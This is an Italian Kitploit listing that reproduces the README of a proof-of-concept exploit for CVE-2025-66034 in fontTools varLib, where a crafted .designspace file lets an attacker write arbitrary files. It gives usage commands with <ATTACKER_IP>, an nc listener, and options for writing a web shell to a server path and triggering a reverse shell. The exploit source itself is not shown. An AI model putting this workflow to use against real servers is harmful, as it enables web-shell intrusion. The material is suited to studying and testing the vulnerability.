Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
varlib-cve-2025-66034 — Exploit proof-of-concept per CVE-2025-66034 nella pipeline di generazione dei font variabili di fontTools. Un file .designspace appositamente realizzato consente di controllare il percorso di output, abilitando la scrittura arbitraria di file. Lo script automatizza la creazione del payload, la generazione dei font e il caricamento per dimostrare il problema. | Kitploit
Strumenti/GitHubGitHub/symphony2colour/varlib-cve-2025-66034
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubsymphony2colour/varlib-cve-2025-66034

varlib-cve-2025-66034

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
210 giorni faNon ancora revisionato

Informazioni

Exploit proof-of-concept per CVE-2025-66034 nella pipeline di generazione dei font variabili di fontTools. Un file .designspace appositamente realizzato consente di controllare il percorso di output, abilitando la scrittura arbitraria di file. Lo script automatizza la creazione del payload, la generazione dei font e il caricamento per dimostrare il problema.

Condividi

Exploit fontTools varLib CVE-2025-66034

cve component vulnerability vector impact language dependency license

Questa repository non introduce una nuova vulnerabilità.

Questo è un exploit Proof-of-concept per CVE-2025-66034 che interessa la pipeline di generazione di font variabili fontTools varLib.

La vulnerabilità consente agli attaccanti di controllare il nome del file di output all'interno di un file .designspace appositamente creato. Quando viene elaborato da un servizio di generazione di font vulnerabile, ciò può portare alla scrittura arbitraria di file sul filesystem del server.

Lo script varlib_cve_2025_66034.py automatizza la creazione del payload, la generazione dei font, l'upload e l'attivazione opzionale della shell.


Caratteristiche

  • Creazione automatica di font master compatibili utilizzando fontTools
  • Generazione casuale del nome del file della shell
  • Percorso di destinazione ed endpoint di upload personalizzabili
  • Listener nc automatico
  • Nessuna preparazione manuale dei font richiesta

Requisiti

Python 3.9+

Installa le dipendenze:

root@kitploit:~
pip install fonttools requests

Netcat è richiesto per il listener, pertanto il seguente comando è necessario se utilizzi l'opzione --no-listen:

root@kitploit:~
nc -lvnp <PORT_NUMBER>

Utilizzo

Se il tuo target è un laboratorio self-hosted in esecuzione su mysite.com, e il percorso di upload, il percorso di scrittura sul filesystem e il percorso di attivazione accessibile via web corrispondono ai valori predefiniti nello script, puoi eseguirlo direttamente.

Utilizzo base:

root@kitploit:~
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT>

È molto probabile che il target utilizzi URL o percorsi filesystem diversi; sovrascrivi i valori predefiniti con le opzioni disponibili di seguito, come --url, --path e --trigger, oppure modifica lo script manualmente

Nota: i nomi dei campi del form multipart possono variare a seconda dell'ambiente. Se il target non utilizza gli stessi nomi di campo del form dello script, modificali nella sezione files prima di eseguire l'exploit.

Opzioni

ArgomentoDescrizione
--ipIP del listener dell'attaccante
--portPorta del listener
--pathPercorso filesystem di destinazione in cui verrà scritto il file (deve essere accessibile via web per attivare una web shell)
--urlEndpoint di upload, il form può variare
--triggerURL di base utilizzato per attivare il payload scritto dopo l'upload
--no-listenDisabilita il listener netcat automatico

Esempio con opzioni personalizzate:

root@kitploit:~
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT> --path /var/www/mysite.com/public --url http://mysite.com/tools/variable-font-generator/process --trigger http://mysite.com

Flusso dell'exploit

  1. Genera font master compatibili
  2. Crea un file .designspace dannoso
  3. Carica il payload tramite POST multipart
  4. Scrivi un file arbitrario sul server
  5. Attiva il payload tramite richiesta HTTP

Crediti / Ringraziamenti

Un ringraziamento speciale e rispetto a:

  • I maintainer e i contributori del progetto fontTools per il loro lavoro sulla libreria open-source fontTools.
  • I ricercatori di sicurezza che hanno scoperto e divulgato responsabilmente CVE-2025-66034.
  • La community di sicurezza open-source per aver documentato e analizzato le vulnerabilità che aiutano a migliorare la sicurezza del software.

Questa proof-of-concept è fornita a scopo educativo e di ricerca per aiutare a comprendere la vulnerabilità e il suo impatto.


Disclaimer

Questo codice è fornito solo a scopo educativo e di ricerca.

Non utilizzare questo exploit contro sistemi che non possiedi o per i quali non hai esplicita autorizzazione a testare.

L'autore non è responsabile per usi impropri o danni causati da questo software.


Riferimenti

  • Dettagli CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-66034
  • Advisory GitHub: https://github.com/advisories/GHSA-768j-98cg-p3fv
  • Progetto fontTools: https://github.com/fonttools/fonttools
  • Documentazione fontTools: https://fonttools.readthedocs.io/
Scarica lo strumento